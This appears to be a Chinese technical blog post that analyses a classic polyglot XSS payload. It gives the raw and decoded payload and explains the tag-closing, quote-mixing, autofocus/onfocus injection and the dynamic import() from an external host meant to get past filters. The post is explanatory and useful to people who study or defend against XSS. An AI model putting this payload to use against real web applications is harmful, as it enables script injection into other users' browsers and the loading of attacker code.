【XSS payload 】一个经典的XSS payload

zhengfei6112026-02-25 20:06

整体结构

原始Payload:

复制代码 
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https: X55.is/.source))}//\76-->
复制代码

解码关键部分:

  • %250A → 换行符 \n

  • %26apos;'(HTML实体单引号)

  • \74 → 八进制 <

  • \76 → 八进制 >

解码后大致为:

复制代码 
JavaScript://\n/*?'/*\'/*"/*\"/*`/*\`/*')/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript><k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https: X55.is/.source))}//>
-->
复制代码

注意末尾的 //>--> 是分离的。

各组成部分的作用

1. JavaScript伪协议 + 换行绕过注释

  • JavaScript:// 试图构造一个 javascript: URL(大小写不敏感),但多了一个斜杠,实际浏览器可能仍解析为伪协议。

  • %250A 解码为换行符,用于结束单行注释 //,使得后续代码变为可执行。

  • javascript: URL 中,浏览器先对URL解码,然后执行得到的JavaScript代码。解码后为 JavaScript://\n...,其中 // 注释掉空内容,换行后代码开始执行。

2. 多种引号和注释混淆
  • /*?'/*\'/*"/*\"/*/*`/*')/*<!--这部分包含各种引号(单、双、反引号)及转义版本,以及HTML实体,旨在绕过WAF对特定字符的过滤。同时夹杂/*<!--` 注释,可能试图干扰解析器。
3. 闭合常见HTML标签
  • </Title></Style></Script></textArea></iFrame></noScript> 试图关闭可能存在的父标签,使后续内容作为新的HTML插入,从而注入新元素。
4. 注入新标签及事件处理器

  • \74k<K 解码为 <k<K,可能是 <k<K 标签(不标准,但浏览器会尝试解析为标签名)。随后紧跟 /contentEditable/autoFocus/OnFocus=,这试图为标签设置属性:

    • contentEditable 使元素可编辑

    • autoFocus 使页面加载时自动获得焦点

    • OnFocus 定义焦点事件的处理函数

  • 属性值是一段JavaScript代码,其中包含多层注释和 import() 调用。

5. 事件处理函数中的JavaScript

OnFocus 的值:

复制代码 
/*${/*/;{/**/(import(/https: X55.is/.source))}//\76-->
复制代码

  • 经过注释解析后,实际执行的代码为:{ /**/ (import(/https: X55.is/.source)) }(前面的 /*...*/ 注释掉了 /*${/*/;,后面的 //> 注释掉剩余部分)。

  • import(/https: X55.is/.source)

    • /https: X55.is/ 是一个正则表达式字面量,.source 返回其字符串内容 "https: X55.is"

    • 因此 import() 试图动态加载模块 "https: X55.is",但该URL包含空格,实际无效。可能本意是加载 https://X55.is/,但写法有误。

  • 如果加载成功,该外部脚本可能包含 alert() 或其他恶意代码。

6. HTML注释闭合
  • 最后的 \76--> 解码为 >-->,可能试图闭合前面可能存在的 <!-- 注释,确保HTML结构完整。

攻击原理总结

该Payload尝试在多种上下文中执行:

  • 作为 javascript: URL :若放在 hrefsrc 中,点击或加载时会执行解码后的代码,触发动态导入。

  • 作为HTML注入 :若插入到页面中,它会闭合已有标签,创建新元素(如 <k>)并设置 onfocus 事件,当元素获得焦点(如通过 autofocus)时执行事件中的 import()

  • 动态导入:尝试加载外部脚本,若成功则可能弹出弹窗。

由于语法错误(import 参数格式不对),该Payload可能无法直接执行,但反映了攻击者常用的混淆技术,包括:

  • URL编码绕过

  • 注释嵌套和换行

  • 多种引号组合

  • 标签闭合和事件注入

  • ES6动态导入

注意 :实际测试时,import() 需要正确的模块URL,且受CORS限制,因此该Payload可能仅用于演示或绕过WAF的测试。

相关推荐
excel1 小时前
如何解决 Nuxt DevTools 中关于 unstorage 包的报错
前端
Rust研习社2 小时前
使用 Axum 构建高性能异步 Web 服务
开发语言·前端·网络·后端·http·rust
C澒2 小时前
AI 生码 - API2Code:接口智能匹配与 API 自动化生码全链路设计
前端·低代码·ai编程
浔川python社2 小时前
HTML头部元信息避坑指南技术文章大纲
前端·html
IT_陈寒2 小时前
SpringBoot配置加载顺序把我坑惨了
前端·人工智能·后端
kyriewen2 小时前
Next.js部署:从本地跑得欢,到线上飞得稳
前端·react.js·next.js
Moment2 小时前
面试官:给 llm 传递上下文,有哪几个身份 role ❓❓❓
前端·后端·面试
跨境数据猎手3 小时前
跨境独立站系统技术拆解(附带源码)
服务器·前端·php
豹哥学前端3 小时前
用猜数字游戏,一口气掌握 JavaScript 核心知识点(附完整代码)
前端·javascript
忆往wu前3 小时前
从0到1一步步拆解搭建,梳理一个 Vue3 简易图书后台全开发流程
前端·javascript·vue.js
热门推荐
01GitHub 镜像站点02近期有什么ai的新消息,新动态? 2026.4月03Codex 接入 DeepSeek API 完整配置文档042026年4月AI大事件深度解读:大模型竞争进入“深水区“052026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot06【AI】2026 年具身智能模型和世界模型总结07在Windows 11上安装Docker的踩坑记录08零基础教你claude code 接入 deepseek V409VSCode + Copilot下:配置并使用 DeepSeek10裂开!ChatGPT 居然开始要手机号验证,附详细解决方法